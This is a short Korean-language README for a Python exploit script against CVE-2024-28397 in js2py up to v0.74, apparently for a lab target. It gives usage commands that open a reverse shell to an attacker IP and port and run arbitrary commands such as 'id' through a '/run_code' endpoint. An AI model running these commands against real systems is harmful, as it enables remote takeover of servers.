
CVE-2024-28397을 대상으로 하는 js2py <= v0.74용 Python 익스플로잇 스크립트입니다. 리버스 셸 및 HTTP 엔드포인트를 통한 사용자 정의 명령 실행을 지원합니다.
기본 리버스 셸 페이로드 및 선택적 명령 인자 허용
익스플로잇은 js2py <= v0.74에서 작동합니다
requests 라이브러리 (pip install requests)리버스 셸:
python exploit.py 10.129.227.108 /run_code --local_ip 10.10.14.71 --local_port 4444
사용자 정의 명령:
python exploit.py 10.129.227.108 /run_code --cmd "id"